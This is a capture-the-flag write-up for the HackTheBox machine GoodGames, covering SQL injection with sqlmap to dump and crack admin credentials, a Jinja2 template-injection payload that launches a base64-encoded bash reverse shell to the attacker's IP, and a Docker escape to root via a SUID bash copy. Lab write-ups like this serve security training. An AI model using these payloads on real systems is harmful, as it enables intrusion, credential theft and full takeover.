--- title: "Writeup - GoodGames (HTB)" date: 2022-03-19 slug: "writeup-goodgames-htb" type: "writeup-ctf" --- This is a writeup for the [GoodGames](https://app.hackthebox.com/machines/GoodGames) machine from the HackTheBox site. ## Enumeration First, let's start with a scan of our target with the following command: ```bash nmap -sV 10.10.11.130 ``` One TCP ports are discovered: ![](img/image-1.webp) - 80/tcp : HTTP web server (Apache 2.4.51) ![](img/image-2.webp) ## Exploit I start by listing the pages accessible through the website. ![](img/image-3.webp) There are a number of pages, but 3 are pages with a form: login, forgot-password and signup. With a form we can potentially make SQL injection. First I get a login request via Burp. ```bash POST /login HTTP/1.1 Host: 10.10.11.130 Content-Length: 36 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.11.130 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.11.130/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close email=test%40test.fr&password=azerty ``` I save this request in a "request.txt" file, then I run SQLmap to determine if this form is injection sensitive. ```bash sqlmap -r request.txt ``` This form is usable, so I use the following command to list the accessible databases: ```bash sqlmap -r request.txt --dbs [...] [12:51:20] [INFO] retrieved: main available databases [2]: [*] information_schema [*] main [...] ``` I select the database "main" and start to list the different tables. ```bash sqlmap -r request.txt -D main --dump [...] [12:53:58] [INFO] retrieved: blog [12:54:30] [INFO] retrieved: blog_comments [12:55:51] [INFO] retrieved: user [12:56:20] [INFO] fetching columns for table 'blog' in database 'main' [12:56:20] [INFO] retrieved: 15 [...] ``` I select the "user" table and run the following command to dump the data. ```bash sqlmap -r request.txt -D main -T user --dump [...] admin@goodgames.htb [13:00:19] [INFO] retrieved: 1 [13:00:23] [INFO] retrieved: admin [13:00:42] [INFO] retrieved: 2b22337f218b2d82dfc3b6f77e7cb8ec [...] ``` Ok, we have the credentials of the admin user! We just need to get the password hash and run john to decrypt it. ![](img/image-4.webp) John quickly finds the password: superadministrator. I can now connect and access the admin panel. This panel is accessible via a subdomain, so I add it in my /etc/hosts file: ```bash 10.10.11.130 internal-administration.goodgames.htb ``` I fill in the credentials I found before and connect to the admin panel of the site. ![](img/image-5.webp) In this panel I find a tab where I can customize the account nickname. Let's determine the PHP template used by the site. For that I use the following github: [PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF - PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings![](https://github.com/fluidicon.png) {{< github repo="swisskyrepo/PayloadsAllTheThings" >}} Quickly I determine that the site uses the Jinja2 Template. I will be able to use an injection to execute commands on the server. For that I use the following injection: ```bash {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} ``` To make a shell reversel it's a bit more complex, I didn't manage to put just the command, so I use the base64 method to avoid that the command is modified during the process. To do this I encode my reverse in base64 then I use the following injection to transmit it on the remote server: ```bash {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40LzEyMzQgMD4mMQo=" | base64 -d | bash').read() }} ``` ![](img/image-6.webp) I now have a root shell (I think we are in a docker) and I can get the first flag. ```bash root@3a453ab39d3d:/home/augustus# ls user.txt root@3a453ab39d3d:/home/augustus# cat user.txt dec6a8b304bbe0fdfe4b8c46a3562605 ``` ## Privilege escalation As said before, I think we are in a docker. What I can confirm after some research. After checking my IP, we can safely say that the IP of the host is 172.19.0.1. ![](img/image-7.webp) So I do an nmap scan on the host IP: ![](img/image-8.webp) The SSH port is open! We can now try to connect to the user augustus to exit the docker. I first upgrade my reverse shell with the following command (this is very important for the following). ```bash python -c 'import pty; pty.spawn("/bin/bash")' ``` I am doing an SSH on the user augustus using the password previously used: ![](img/image-9.webp) I am now in the host machine, interesting thing I notice the nmap file I uploaded in the docker is present in the folder of augustus. But what is even more interesting is that he has kept his root privilege! ![](img/image-10.webp) What I will be able to do is to make a copy of bash. Then in the docker add the execution rights. Then go back to the host and create a bash root. To do this, I first copy the bash file from the host machine into the augustus folder: ```bash cp /bin/bash ./ ``` Then I go back to the docker and add the following rights: ```bash chown root:root bash chmod 4777 bash ``` Finally I go back to the host and run a bash root: ```bash augustus@GoodGames:~$ ./bash -p bash-5.1# cat /root/root.txt cat /root/root.txt 702332b6faa16ef1b87c5ae52a2ef3df ``` I now have control of the host machine and can recover the last flag. ## Recommendations To patch this host I think it would be necessary to perform a number of actions: - Patch forms to avoid sql injection - Use strong passwords - Do not use the same password for two different services - Do not launch dockers with root privilege